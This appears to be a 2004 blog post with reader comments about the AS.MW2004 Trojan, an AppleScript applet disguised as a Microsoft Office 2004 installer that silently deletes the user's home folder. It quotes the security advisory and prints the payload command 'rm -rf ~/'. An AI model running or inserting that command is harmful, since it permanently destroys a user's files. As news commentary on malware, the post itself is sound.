Trojan Horses
Posted May 13th, 2004 @ 02:23pm by Erik J. Barzeski
File this one under "if you're stupid enough to run a 108k 'Office 2004' Installer from a peer-to-peer network, you deserve to have all of your ~/ deleted":
Intego, the Macintosh security specialist, was notified by Macworld (UK) on May 10, 2004 about a Trojan horse, discovered by one of its readers who downloaded and ran an application from the Gnutella peer-to-peer network. The AS.MW2004.Trojan is a compiled AppleScript applet, a 108 KB self-contained application, with an icon resembling an installer for Microsoft Office 2004 for Mac OS X. This AppleScript runs a Unix command that removes files, using AppleScript's ability to run such commands. The AppleScript displays no messages, dialogs or alerts. Once the user double-clicks this file, their home folder and all its contents are deleted permanently.
run shell script "rm -rf ~/"
. BTW, I love the screenshot they've got on their site: "What would you like to do: repair?" Just friggin' delete the damn thing, what's a repair going to do but leave you with an AppleScript that doesn't do anything? And when you're done deleting that, delete your P2P software too.
In other exciting news, I've just finished iTunes 4.6!!! It circumvents the iTunes Music Store and lets you download music for free. Plus, it works in Europe and Antarctica!!! Download it here (157k .dmg).
Uh huh.
Posted 13 May 2004 at 2:54pm #
Apparently, the fine folks at Intego realized you need viruses if you're going to sell virus software...
Posted 13 May 2004 at 3:09pm #
They're idiots... The moose at the gate should have told you that.
Posted 13 May 2004 at 3:47pm #
In all honesty, the 108k bit isn't necessarilly an indicator that it isn't real. It's totally possible to download a stub that fetches the meat from a remote site. We did this at Mplayer/HearMe, and I think Netscape did it for a while too.
- Scott
Posted 13 May 2004 at 4:13pm #
Well, if a w4r3z kiddie wants to fetch a version of Office 2004 directly from microsoft.com...
Posted 13 May 2004 at 7:40pm #
Am I alone is holding Intego partially responsible for the appearance of this Trojan horse? Within weeks of their FUD press release, which up to that time had appeared only in a technical bulletin board, and was unlikely to be caught by anyone interested in causing any damage, an actual malicious program appears based on similar techniques. I'm not implying that they wrote or released the Trojan horse, but I do think that their earlier press release was irresponsible and likely led to this Trojan horse being released.
Posted 13 May 2004 at 8:18pm #
This is a test.
Posted 13 May 2004 at 9:11pm #
I am the upgrade document...